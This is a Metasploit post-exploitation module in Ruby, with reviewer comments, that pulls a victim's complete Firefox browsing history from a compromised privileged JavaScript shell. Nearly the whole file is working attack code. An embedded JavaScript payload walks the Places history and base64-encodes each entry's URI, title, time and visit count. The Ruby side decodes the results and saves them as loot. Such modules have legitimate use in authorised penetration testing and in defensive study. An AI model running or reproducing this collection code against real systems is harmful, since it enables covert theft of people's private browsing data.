##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'json'
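class MetasploitModule < Msf::Post
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation

  # Post module that collects the browser history of a Firefox session that is
  # already controlled through a privileged JavaScript shell. The JavaScript is
  # delivered via js_exec, provided by the FirefoxPrivilegeEscalation mixin.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Firefox Gather History from Privileged JavaScript Shell',
        'Description' => %q{
          This module allows collection of the entire browser history from a Firefox
          Privileged JavaScript Shell.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'joev' ],
        'DisclosureDate' => '2014-04-11',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )

    # NOTE(review): TIMEOUT is not read in this file; presumably js_exec in the
    # mixin honours it — confirm against the mixin before relying on it.
    register_options([
      OptInt.new('TIMEOUT', [true, 'Maximum time (seconds) to wait for a response', 90])
    ])
  end

  # Executes js_payload in the session, decodes every base64-wrapped field of
  # the returned entries and stores the result as JSON loot.
  #
  # The payload answers either with a JSON array of entry objects or, when the
  # JavaScript raised, with the exception itself (see the catch block in
  # js_payload). Anything that is not a JSON array of objects is therefore
  # reported as a warning rather than treated as history data.
  def run
    results = js_exec(js_payload)
    if results.blank?
      print_status('No response received from the Firefox JavaScript shell')
      return
    end

    begin
      history = JSON.parse(results)
    rescue JSON::ParserError
      # Most likely the raw exception text sent from the payload's catch block.
      print_warning(results)
      return
    end

    unless history.is_a?(Array) && history.all? { |entry| entry.is_a?(Hash) }
      # Valid JSON, but not the list of entry objects the payload produces.
      print_warning(results)
      return
    end

    history = decode_entries(history)
    file = store_loot('firefox.history.json', 'text/json', rhost, history.to_json)
    print_good("Saved #{history.length} history entries to #{file}")
  end

  # JavaScript run inside the privileged shell. It walks the Places history
  # result tree and sends back a JSON array of {uri, title, time, accessCount}
  # objects; each field is btoa()-encoded so that arbitrary characters survive
  # the transport and are decoded again in #decode_entries. Any JavaScript
  # exception is sent back as-is instead.
  def js_payload
    %|
      (function(send){
        try {
          var service = Components
            .classes["@mozilla.org/browser/nav-history-service;1"]
            .getService(Components.interfaces.nsINavHistoryService);
          var b64 = Components.utils.import("resource://gre/modules/Services.jsm").btoa;

          var query = service.getNewQuery();
          var options = service.getNewQueryOptions();
          var result = service.executeQuery(query, options);
          var fields = [];
          var entries = [];

          var root = result.root;
          root.containerOpen = true;

          for (var i = 0; i < result.root.childCount; ++i) {
            var child = result.root.getChild(i);
            if (child.type == child.RESULT_TYPE_URI) {
              entries.push({
                uri: b64(child.uri),
                title: b64(child.title),
                time: b64(child.time),
                accessCount: b64(child.accessCount)
              });
            }
          }

          result.root.containerOpen = false;

          send(JSON.stringify(entries));
        } catch (e) {
          send(e);
        }
      })(this.send);
    |.strip
  end

  private

  # Reverses the btoa() wrapping applied by js_payload to each entry field.
  #
  # @param history [Array<Hash>] parsed entries whose values are base64 strings
  # @return [Array<Hash>] new hashes with every String value base64-decoded;
  #   non-String values (never emitted by the payload) are passed through so an
  #   unexpected shape does not abort the whole run
  def decode_entries(history)
    history.map do |entry|
      entry.transform_values do |value|
        value.is_a?(String) ? Rex::Text.decode_base64(value) : value
      end
    end
  end
end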